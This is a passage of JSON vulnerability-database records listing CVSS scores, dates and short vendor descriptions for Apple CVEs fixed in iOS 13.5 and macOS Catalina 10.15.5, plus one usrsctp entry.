"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9818"], "modified": "2020-06-12T15:00:00", "id": "PRION:CVE-2020-9818", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9818", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:09", "description": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted audio file may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9815"], "modified": "2022-04-27T14:32:00", "id": "PRION:CVE-2020-9815", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9815", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:07", "description": "A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9803"], "modified": "2021-12-01T02:37:00", "id": "PRION:CVE-2020-9803", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9803", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:06", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9789"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9789", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9789", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:12", "description": "An integer overflow was addressed through improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Integer overflow", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9852"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9852", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9852", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:08", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9814"], "modified": "2021-07-21T11:39:00", "id": "PRION:CVE-2020-9814", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9814", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:40:13", "description": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T21:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3878"], "modified": "2022-06-05T03:09:00", "id": "PRION:CVE-2020-3878", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-3878", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:08", "description": "An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to determine kernel memory layout.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Information disclosure", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9809"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9809", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9809", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-11-22T01:50:07", "description": "An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A local user may be able to read kernel memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Information disclosure", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9812"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9812", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9812", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-11-22T02:10:40", "description": "usrsctp before 2019-12-20 has out-of-bounds reads in sctp_load_addresses_from_init.", "cvss3": {"cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2020-03-06T20:15:00", "type": "prion", "title": "Out-of-bounds", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-20503"], "modified": "2023-07-07T01:15:00", "id": "PRION:CVE-2019-20503", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2019-20503", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T01:50:05", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9795"], "modified": "2020-06-11T17:08:00", "id": "PRION:CVE-2020-9795", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9795", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:05", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9790"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9790", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9790", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:08", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to cause unexpected system termination or write kernel memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9808"], "modified": "2021-07-21T11:39:00", "id": "PRION:CVE-2020-9808", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9808", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:07", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9806"], "modified": "2021-12-01T02:29:00", "id": "PRION:CVE-2020-9806", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9806", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:07", "description": "An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to determine another application's memory layout.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Information disclosure", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9797"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9797", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9797", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T01:50:10", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9816"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9816", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9816", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:05", "description": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted audio file may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9791"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9791", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9791", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:13", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A remote attacker may be able to cause arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9850"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9850", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9850", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:08", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": 